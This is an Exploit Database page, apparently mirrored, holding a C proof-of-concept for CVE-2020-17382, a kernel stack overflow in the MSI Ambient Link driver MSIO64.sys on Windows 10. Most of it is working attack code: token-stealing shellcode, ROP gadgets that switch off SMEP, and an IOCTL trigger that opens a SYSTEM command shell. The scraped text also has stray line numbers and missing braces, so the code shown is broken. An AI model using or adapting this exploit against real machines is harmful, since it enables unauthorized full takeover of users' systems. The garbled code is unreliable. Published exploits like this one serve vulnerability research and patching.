MSI Ambient Link Driver 1.0.0.8 – Local Privilege Escalation

Exploit Database
98 阅读

作者： Matteo Malvica

日期： 2020-09-28
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/48836/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation

Date: 2020-09-24

Exploit Author: Matteo Malvica

Vendor Homepage: https://www.msi.com

Software Link: https://msi.gm/ABLTMNB

Driver: MSIO64.sys

SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD

Version: 1.0.0.8

Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406]

MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation

CVE: CVE-2020-17382

Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/

Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities

#include <iostream>

#include <string>

#include <Windows.h>

#include <Psapi.h>

#pragma warning( disable : 6387 )

VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) {

// SHELLCODE FOR 1709

BYTE token_steal[] =

"\x65\x48\x8B\x14\x25\x88\x01\x00\x00"// mov rdx, [gs:188h] ; Get _ETHREAD pointer from KPCR

"\x4C\x8B\x82\xB8\x00\x00\x00"// mov r8, [rdx + b8h]; _EPROCESS (kd> u PsGetCurrentProcess)

"\x4D\x8B\x88\xe8\x02\x00\x00"// mov r9, [r8 + 2e8h]; ActiveProcessLinks list head

"\x49\x8B\x09"// mov rcx, [r9]; Follow link to first process in list

//find_system_proc:

"\x48\x8B\x51\xF8"// mov rdx, [rcx - 8] ; Offset from ActiveProcessLinks to UniqueProcessId

"\x48\x83\xFA\x04"// cmp rdx, 4 ; Process with ID 4 is System process

"\x74\x05"// jz found_system; Found SYSTEM token

"\x48\x8B\x09"// mov rcx, [rcx] ; Follow _LIST_ENTRY Flink pointer

"\xEB\xF1"// jmp find_system_proc ; Loop

//found_system:

"\x48\x8B\x41\x70"// mov rax, [rcx + 70h] ; Offset from ActiveProcessLinks to Token

"\x24\xF0"// and al, 0f0h ; Clear low 4 bits of _EX_FAST_REF structure

//find cmd

"\x48\x8B\x51\xF8"// mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId

"\x48\x81\xFA\x99\x99\x00\x00"// cmp rdx, 0d54h ;UniqueProcessId == ZZZZ? (PLACEHOLDER)

"\x74\x05"// jz found_cmd ;YES - move on

"\x48\x8B\x09"// mov rcx, [rcx] ;NO - next entry in list

"\xEB\xEE"// jmp find_cmd ;loop

// found cmd

"\x48\x89\x41\x70"// mov [rcx+70h], rax ;copy SYSTEM token over top of this process's token

"\x48\x31\xc9"// xor rcx rcx; clear some registers to avoid issues while unwinding the call stack

"\x48\x31\xc0"// xor rax rax

"\x48\x31\xf6"// xor rsi,rsi

"\x48\x31\xff"// xor rdi, rdi

"\x4D\x31\xC0"// xor r8, r8

"\x48\xc7\xc1\xf8\x06\x15\x00"// mov rcx, 0x1506f8; move original cr4 value into rcx

"\xc3"; // ret; RET

token_steal[54] = pid;

token_steal[55] = pid >> 8;

LPVOID allocated_shellcode = VirtualAlloc(NULL,

sizeof(token_steal),

MEM_COMMIT | MEM_RESERVE,

PAGE_EXECUTE_READWRITE);

memcpy(allocated_shellcode, token_steal, sizeof(token_steal));

INT64 pop_rcx_offset = kernel_base + 0x15fc70;// gadget 1 1709 - pop rcx ; ret

INT64 mov_cr4_offset = kernel_base + 0x76a02; // gadget 2 1709 - mov cr4, ecx ; ret

INT64 wbindv_offset = kernel_base + 0x1175c0;;// gadget 3 1709 - wbinvd; ret

INT64 rcx_value = 0x506f8;// value we want placed in cr4 in order to disable SMEP

INT64 rcx_old_value = 0x1506f8; // original cr4 value

INT64 ret = pop_rcx_offset + 1; // RET NOP

puts("[+] SMEP disabled");

BYTEinput_buff[136] = { 0 };

memset(input_buff, '\x41', 64);

memset(input_buff, '\x42', 8);// dummy RBP

memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8);// pop rcx

memcpy(input_buff + 80, (PINT64)&rcx_value, 8); // disable SMEP value

memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8);// mov cr4, rcx

memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8); // wbinvd; ret

memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode

memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx

memcpy(input_buff + 120, (PINT64)&ret, 8);// RETNOP to restore the stack

memcpy(input_buff + 128, (PINT64)&ret, 8);// RETNOP to restore the stack

printf("[+] Payload buffer located at: 0x%p\n", &allocated_shellcode);

DWORD lpBytesReturned = 0x0;

BOOL triggerIOCTL = DeviceIoControl(hFile,

IoControlCode,

input_buff,

sizeof(input_buff),

NULL,

&lpBytesReturned,

NULL);

if (!triggerIOCTL) {

printf("[!] DeviceIoControl failed: %d\n", GetLastError());

}

else {

puts("[+] SMEP re-enabled");

puts("[+] Enjoy your SYSTEM shell\n");

}

system("start cmd.exe");

}

LPVOID GetBaseAddr(const char* drvname) {

LPVOID drivers[1024];

DWORD cbNeeded;

int nDrivers, i = 0;

if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {

char szDrivers[1024];

nDrivers = cbNeeded / sizeof(drivers[0]);

for (i = 0; i < nDrivers; i++) {

if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {

if (strcmp(szDrivers, drvname) == 0) {

return drivers[i];

}

return 0;

}

HANDLE GetDriverHandle() {

HANDLE hMsio;

hMsio = CreateFileA("\\\\.\\MsIo",

FILE_READ_ACCESS | FILE_WRITE_ACCESS,

FILE_SHARE_READ | FILE_SHARE_WRITE,

NULL,

OPEN_EXISTING,

FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,

NULL);

if (hMsio == INVALID_HANDLE_VALUE) {

printf("[-] Error obtaining an handle to the driver: %d\n", GetLastError());

exit(1);

}

return hMsio;

}

int main() {

puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica");

DWORD IoControlCode = 0x80102040;

HANDLE hDevice = GetDriverHandle();

INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe");

DWORD pid = GetCurrentProcessId();

eopMsio(hDevice, nt, pid, IoControlCode);

return 0;

}